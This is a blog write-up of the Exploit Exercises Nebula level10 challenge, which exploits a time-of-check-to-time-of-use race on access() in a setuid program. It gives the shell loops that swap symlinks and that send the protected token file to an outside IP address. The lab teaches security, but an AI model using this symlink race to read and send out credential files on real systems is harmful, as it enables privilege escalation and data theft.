June 30, 2016 Karn Ganeshen

Exploit Exercises – nebula level10

Exploit Exercises – nebula level10

Researching on access() requirements, we find this:
Level10 dir has a file x which contains the token / password for flag10. It shouldn’t be there. We need to find a way to transfer the token file.
We don’t have access to token.
 
We will need to exploit race conditions with access() calls used in the program code:
 

Checking how flag10 works normally:

Ok.
 
Following steps are needed to exploit access() race condition:
  1. Create a fake token file – echo fake_toke > /tmp/fake_token
  2. Create soft link of our fake_token – ln -sf /tmp/fake_token token
  3. Create soft link of real token with same name – ln -s /home/flag10/token token
  4. Eexecute 1 & 2 in a loop – while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute file transfer in a loop – while true; do /home/flag10/flag10 token 192.168.49.1; done

 

Token is transferred successfully. Use it to log in as flag10 and run getflag.

 
+++++
Tagged: ,

Leave a Reply

Your email address will not be published. Required fields are marked *